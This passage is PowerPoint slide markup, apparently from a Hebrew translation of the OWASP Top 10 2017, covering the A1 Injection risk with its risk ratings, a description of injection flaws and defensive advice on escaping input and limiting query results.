                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>APIs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) עבור יישומי מובייל.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>עבור כל השאילות הדינאמיות הקבועות, נדרש לבצע </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> לתווים מיוחדים בהתאם לשפת רכיב התרגום.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>שים</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>לב</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: עבור שאילתות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> כגון שמות טבלאות, שמות טורים וכו', לא ניתן לבצע  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ולכן מידע המוזן ע"י המשתמש נחשב מסוכן. זו בעיה נפוצה בפיתוח תוכנה.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-82550" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>השתמש ב-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>LIMIT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> ושאר פקודות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> בתוך השאילתות על-מנת למנוע חשיפת מידע במקרה של מתקפת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront"/>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="1200000"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d extrusionH="76200">
            <a:bevelT w="63500" h="25400"/>
            <a:extrusionClr>
              <a:schemeClr val="bg1"/>
            </a:extrusionClr>
          </a:sp3d>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr tIns="216000" bIns="36000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>A1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:2017</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" sz="2700" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  הזרקת קוד זדוני (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2700" dirty="0" smtClean="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1707110481"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836272" cy="2101908"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1396800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1404000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1011472">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1008000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="554400">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="287508">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יכולת ניצול: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>שכיחות: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יכולת גילוי: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="OpenSymbol"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>השפעה טכנית: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1260000">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>כמעט כל מקור מידע עשוי להוות וקטור להזרקת קוד זדוני, הזרקת משתני</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> סביבה, פרמטרים, שירותי </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Web Service</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> פנימיים וחיצוניים, וכל סוג של משתמשים. חולשת הזרקת קוד זדונית קורית כאשר תוקף שולח קוד עוין לרכיב התרגום. למידע נוסף ראה: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId23"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org/index.php/Injection_Flaws</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>הזרקות קוד זדוניות שכיחות מאוד, בייחוד בקוד</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ישן (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>legacy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
